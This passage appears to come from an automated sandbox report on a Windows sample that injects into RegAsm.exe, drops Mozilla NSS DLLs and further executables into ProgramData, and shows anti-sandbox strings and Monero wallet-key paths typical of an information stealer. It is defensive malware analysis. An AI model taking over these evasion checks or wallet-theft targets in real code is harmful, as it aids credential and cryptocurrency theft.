Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2649143006.0000000038576000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2640919241.000000002C69B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2881426007.000000002264B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2787844428.00000000228AB000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3067781475.000000006C7C5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00418A9A GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00418A9A

PE file contains sections with non-standard names

Source: freebl3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.3.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: sql[1].dll.3.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.3.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F292 push ecx; ret	3_2_0042F2A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042CDFE push esi; retn 0042h	3_2_0042CDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422E8A push esi; ret	3_2_00422E8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DF05 push ecx; ret	3_2_0041DF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B536 push ecx; ret	3_2_6C54B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_224529DE push edi; retn 0000h	14_2_224529E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22583C51 push es; retf	14_2_22583C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225B4BF0 push ecx; ret	14_2_225B4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225BA45D push esi; ret	14_2_225BA45F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225FF456 push ebx; ret	14_2_225FF457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225ED568 push esp; retf	14_2_225ED570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225EDB66 push esp; retf	14_2_225EDB67

Source: file.exe	Static PE information: section name: .text entropy: 7.996029289686649
Source: KECBKKEBKE.exe.3.dr	Static PE information: section name: .text entropy: 7.995413357235682
Source: 66fa2b049020f_ldnf[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995413357235682
Source: EGDGCGCFHI.exe.3.dr	Static PE information: section name: .text entropy: 7.995787945508988
Source: 66fa2afc5abea_vasd[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995787945508988
Source: DBGIJEHIID.exe.3.dr	Static PE information: section name: .text entropy: 7.994247352025327

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userIJEGDBGDBF.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2b049020f_ldnf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBGIJEHIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2afc5abea_vasd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fa2ae906657_snd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EGDGCGCFHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\userGIEGHJEGHJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2b049020f_ldnf[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66fa2afc5abea_vasd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECBKKEBKE.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\EGDGCGCFHI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\DBGIJEHIID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\KECBKKEBKE.exe	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418A9A

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userGIEGHJEGHJ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userIJEGDBGDBF.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EGDGCGCFHI.exe.43d5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ce5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2560292223.000000000440E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2762920375.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 424, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000043A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 4CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 8C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Memory allocated: 4560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 1930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Memory allocated: 1980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 1140000 memory reserve \| memory write watch
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 29C0000 memory reserve \| memory write watch
Source: C:\ProgramData\DBGIJEHIID.exe	Memory allocated: 49C0000 memory reserve \| memory write watch
